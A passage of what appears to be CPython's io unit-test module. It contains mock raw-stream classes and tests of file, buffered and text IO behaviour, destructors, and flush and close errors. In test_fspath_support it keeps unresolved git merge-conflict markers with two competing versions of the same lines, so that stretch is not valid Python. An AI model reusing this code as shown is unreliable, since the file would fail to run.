self._write_stack.append(bytes(b)) return len(b) def writable(self): return True def fileno(self): return 42 def readable(self): return True def seekable(self): return True def seek(self, pos, whence): return 0 # wrong but we gotta return something def tell(self): return 0 # same comment as above def readinto(self, buf): self._reads += 1 max_len = len(buf) try: data = self._read_stack[0] except IndexError: self._extraneous_reads += 1 return 0 if data is None: del self._read_stack[0] return None n = len(data) if len(data) <= max_len: del self._read_stack[0] buf[:n] = data return n else: buf[:] = data[:max_len] self._read_stack[0] = data[max_len:] return max_len def truncate(self, pos=None): return pos class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase): pass class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase): pass class MockRawIO(MockRawIOWithoutRead): def read(self, n=None): self._reads += 1 try: return self._read_stack.pop(0) except: self._extraneous_reads += 1 return b"" class CMockRawIO(MockRawIO, io.RawIOBase): pass class PyMockRawIO(MockRawIO, pyio.RawIOBase): pass class MisbehavedRawIO(MockRawIO): def write(self, b): return super().write(b) * 2 def read(self, n=None): return super().read(n) * 2 def seek(self, pos, whence): return -123 def tell(self): return -456 def readinto(self, buf): super().readinto(buf) return len(buf) * 5 class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase): pass class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase): pass class SlowFlushRawIO(MockRawIO): def __init__(self): super().__init__() self.in_flush = threading.Event() def flush(self): self.in_flush.set() time.sleep(0.25) class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase): pass class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase): pass class CloseFailureIO(MockRawIO): closed = 0 def close(self): if not self.closed: self.closed = 1 raise OSError class CCloseFailureIO(CloseFailureIO, io.RawIOBase): pass class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase): pass class MockFileIO: def __init__(self, data): self.read_history = [] super().__init__(data) def read(self, n=None): res = super().read(n) self.read_history.append(None if res is None else len(res)) return res def readinto(self, b): res = super().readinto(b) self.read_history.append(res) return res class CMockFileIO(MockFileIO, io.BytesIO): pass class PyMockFileIO(MockFileIO, pyio.BytesIO): pass class MockUnseekableIO: def seekable(self): return False def seek(self, *args): raise self.UnsupportedOperation("not seekable") def tell(self, *args): raise self.UnsupportedOperation("not seekable") def truncate(self, *args): raise self.UnsupportedOperation("not seekable") class CMockUnseekableIO(MockUnseekableIO, io.BytesIO): UnsupportedOperation = io.UnsupportedOperation class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO): UnsupportedOperation = pyio.UnsupportedOperation class MockNonBlockWriterIO: def __init__(self): self._write_stack = [] self._blocker_char = None def pop_written(self): s = b"".join(self._write_stack) self._write_stack[:] = [] return s def block_on(self, char): """Block when a given char is encountered.""" self._blocker_char = char def readable(self): return True def seekable(self): return True def seek(self, pos, whence=0): # naive implementation, enough for tests return 0 def writable(self): return True def write(self, b): b = bytes(b) n = -1 if self._blocker_char: try: n = b.index(self._blocker_char) except ValueError: pass else: if n > 0: # write data up to the first blocker self._write_stack.append(b[:n]) return n else: # cancel blocker and indicate would block self._blocker_char = None return None self._write_stack.append(b) return len(b) class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase): BlockingIOError = io.BlockingIOError class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase): BlockingIOError = pyio.BlockingIOError class IOTest(unittest.TestCase): def setUp(self): os_helper.unlink(os_helper.TESTFN) def tearDown(self): os_helper.unlink(os_helper.TESTFN) def write_ops(self, f): self.assertEqual(f.write(b"blah."), 5) f.truncate(0) self.assertEqual(f.tell(), 5) f.seek(0) self.assertEqual(f.write(b"blah."), 5) self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"Hello."), 6) self.assertEqual(f.tell(), 6) self.assertEqual(f.seek(-1, 1), 5) self.assertEqual(f.tell(), 5) buffer = bytearray(b" world\n\n\n") self.assertEqual(f.write(buffer), 9) buffer[:] = b"*" * 9 # Overwrite our copy of the data self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"h"), 1) self.assertEqual(f.seek(-1, 2), 13) self.assertEqual(f.tell(), 13) self.assertEqual(f.truncate(12), 12) self.assertEqual(f.tell(), 13) self.assertRaises(TypeError, f.seek, 0.0) def read_ops(self, f, buffered=False): data = f.read(5) self.assertEqual(data, b"hello") data = byteslike(data) self.assertEqual(f.readinto(data), 5) self.assertEqual(bytes(data), b" worl") data = bytearray(5) self.assertEqual(f.readinto(data), 2) self.assertEqual(len(data), 5) self.assertEqual(data[:2], b"d\n") self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(20), b"hello world\n") self.assertEqual(f.read(1), b"") self.assertEqual(f.readinto(byteslike(b"x")), 0) self.assertEqual(f.seek(-6, 2), 6) self.assertEqual(f.read(5), b"world") self.assertEqual(f.read(0), b"") self.assertEqual(f.readinto(byteslike()), 0) self.assertEqual(f.seek(-6, 1), 5) self.assertEqual(f.read(5), b" worl") self.assertEqual(f.tell(), 10) self.assertRaises(TypeError, f.seek, 0.0) if buffered: f.seek(0) self.assertEqual(f.read(), b"hello world\n") f.seek(6) self.assertEqual(f.read(), b"world\n") self.assertEqual(f.read(), b"") f.seek(0) data = byteslike(5) self.assertEqual(f.readinto1(data), 5) self.assertEqual(bytes(data), b"hello") LARGE = 2**31 def large_file_ops(self, f): assert f.readable() assert f.writable() try: self.assertEqual(f.seek(self.LARGE), self.LARGE) except (OverflowError, ValueError): self.skipTest("no largefile support") self.assertEqual(f.tell(), self.LARGE) self.assertEqual(f.write(b"xxx"), 3) self.assertEqual(f.tell(), self.LARGE + 3) self.assertEqual(f.seek(-1, 1), self.LARGE + 2) self.assertEqual(f.truncate(), self.LARGE + 2) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 2) self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 1) self.assertEqual(f.seek(-1, 2), self.LARGE) self.assertEqual(f.read(2), b"x") def test_invalid_operations(self): # Try writing on a file opened in read mode and vice-versa. exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(os_helper.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "wb", buffering=0) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. def pipe_reader(): [r, w] = os.pipe() os.close(w) # So that read() is harmless return self.FileIO(r, "r") def pipe_writer(): [r, w] = os.pipe() self.addCleanup(os.close, r) # Guarantee that we can write into the pipe without blocking thread = threading.Thread(target=os.read, args=(r, 100)) thread.start() self.addCleanup(thread.join) return self.FileIO(w, "w") def buffered_reader(): return self.BufferedReader(self.MockUnseekableIO()) def buffered_writer(): return self.BufferedWriter(self.MockUnseekableIO()) def buffered_random(): return self.BufferedRandom(self.BytesIO()) def buffered_rw_pair(): return self.BufferedRWPair(self.MockUnseekableIO(), self.MockUnseekableIO()) def text_reader(): class UnseekableReader(self.MockUnseekableIO): writable = self.BufferedIOBase.writable write = self.BufferedIOBase.write return self.TextIOWrapper(UnseekableReader(), "ascii") def text_writer(): class UnseekableWriter(self.MockUnseekableIO): readable = self.BufferedIOBase.readable read = self.BufferedIOBase.read return self.TextIOWrapper(UnseekableWriter(), "ascii") tests = ( (pipe_reader, "fr"), (pipe_writer, "fw"), (buffered_reader, "r"), (buffered_writer, "w"), (buffered_random, "rws"), (buffered_rw_pair, "rw"), (text_reader, "r"), (text_writer, "w"), (self.BytesIO, "rws"), (self.StringIO, "rws"), ) for [test, abilities] in tests: with self.subTest(test), test() as obj: readable = "r" in abilities self.assertEqual(obj.readable(), readable) writable = "w" in abilities self.assertEqual(obj.writable(), writable) if isinstance(obj, self.TextIOBase): data = "3" elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)): data = b"3" else: self.fail("Unknown base class") if "f" in abilities: obj.fileno() else: self.assertRaises(OSError, obj.fileno) if readable: obj.read(1) obj.read() else: self.assertRaises(OSError, obj.read, 1) self.assertRaises(OSError, obj.read) if writable: obj.write(data) else: self.assertRaises(OSError, obj.write, data) if sys.platform.startswith("win") and test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(os_helper.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 5.3) with self.open(os_helper.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(os_helper.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(os_helper.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(os_helper.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(os_helper.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with warnings_helper.check_warnings(('', ResourceWarning)): f = MyFileIO(os_helper.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(os_helper.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w', closefd=False) def test_read_closed(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") with self.open(os_helper.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(os_helper.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(os_helper.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with warnings_helper.check_warnings(('', ResourceWarning)): f = self.FileIO(os_helper.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(os_helper.TESTFN, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(os_helper.TESTFN, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w', closefd=False) os.close(fd) def test_multi_close(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") fd = os.open(os_helper.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. def badopener(fname, flags): return -2 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -2') def test_fileio_closefd(self): # Issue #4841 with self.open(__file__, 'rb') as f1, \ self.open(__file__, 'rb') as f2: fileio = self.FileIO(f1.fileno(), closefd=False) # .__init__() must not close f1 fileio.__init__(f2.fileno(), closefd=False) f1.readline() # .close() must not close f2 fileio.close() f2.readline() def test_nonbuffered_textio(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', buffering=0) def test_invalid_newline(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', newline='invalid') def test_buffered_readinto_mixin(self): # Test the implementation provided by BufferedIOBase class Stream(self.BufferedIOBase): def read(self, size): return b"12345" read1 = read stream = Stream() for method in ("readinto", "readinto1"): with self.subTest(method): buffer = byteslike(5) self.assertEqual(getattr(stream, method)(buffer), 5) self.assertEqual(bytes(buffer), b"12345") def test_fspath_support(self): def check_path_succeeds(path): with self.open(path, "w") as f: f.write("egg\n") with self.open(path, "r") as f: self.assertEqual(f.read(), "egg\n") <<<<<<< HEAD check_path_succeeds(FakePath(os_helper.TESTFN)) check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN))) ======= check_path_succeeds(FakePath(support.TESTFN)) check_path_succeeds(FakePath(os.fsencode(support.TESTFN))) >>>>>>> 3.9 with self.open(os_helper.TESTFN, "w") as f: bad_path = FakePath(f.fileno()) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(None) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(FloatingPointError) with self.assertRaises(FloatingPointError): self.open(bad_path, 'w') # ensure that refcounting is correct with some error conditions with self.assertRaisesRegex(ValueError, 'read/write/append mode'): self.open(FakePath(os_helper.TESTFN), 'rwxa') def test_RawIOBase_readall(self): # Exercise the default unlimited RawIOBase.read() and readall() # implementations. rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.read(), b"abcdefg") rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.readall(), b"abcdefg") def test_BufferedIOBase_readinto(self): # Exercise the default BufferedIOBase.readinto() and readinto1() # implementations (which call read() or read1() internally). class Reader(self.BufferedIOBase): def __init__(self, avail): self.avail = avail def read(self, size): result = self.avail[:size] self.avail = self.avail[size:] return result def read1(self, size): """Returns no more than 5 bytes at once""" return self.read(min(size, 5)) tests = ( # (test method, total data available, read buffer size, expected # read size) ("readinto", 10, 5, 5), ("readinto", 10, 6, 6), # More than read1() can return ("readinto", 5, 6, 5), # Buffer larger than total available ("readinto", 6, 7, 6), ("readinto", 10, 0, 0), # Empty buffer ("readinto1", 10, 5, 5), # Result limited to single read1() call ("readinto1", 10, 6, 5), # Buffer larger than read1() can return ("readinto1", 5, 6, 5), # Buffer larger than total available ("readinto1", 6, 7, 5), ("readinto1", 10, 0, 0), # Empty buffer ) UNUSED_BYTE = 0x81 for test in tests: with self.subTest(test): method, avail, request, result = test reader = Reader(bytes(range(avail))) buffer = bytearray((UNUSED_BYTE,) * request) method = getattr(reader, method) self.assertEqual(method(buffer), result) self.assertEqual(len(buffer), request) self.assertSequenceEqual(buffer[:result], range(result)) unused = (UNUSED_BYTE,) * (request - result) self.assertSequenceEqual(buffer[result:], unused) self.assertEqual(len(reader.avail), avail - result) def test_close_assert(self): class R(self.IOBase): def __setattr__(self, name, value): pass def flush(self): raise OSError() f = R() # This would cause an assertion failure. self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record = [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. raw = self.MockRawIO() closed = [] def bad_flush(): closed[:] = [b.closed, raw.closed] raise OSError() raw.flush = bad_flush b = self.tp(raw) self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) self.assertTrue(raw.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) raw.flush = lambda: None # break reference loop def test_close_error_on_close(self): raw = self.MockRawIO() def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed b.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(b.closed) # Silence destructor error raw.close = lambda: None b.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 raw = self.MockRawIO() def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed b.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(b.closed) # Silence destructor error b.flush = lambda: None raw.close = lambda: None def test_multi_close(self): raw = self.MockRawIO() b = self.tp(raw) b.close() b.close() b.close() self.assertRaises(ValueError, b.flush) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) def test_readonly_attributes(self): raw = self.MockRawIO() buf = self.tp(raw) x = self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) self.assertEqual(b"c", bufio.read1(100)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"d", bufio.read1(100)) self.assertEqual(rawio._reads, 2) self.assertEqual(b"efg", bufio.read1(100)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1(100)) self.assertEqual(rawio._reads, 4) def test_read1_arbitrary(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"bc", bufio.read1()) self.assertEqual(b"d", bufio.read1()) 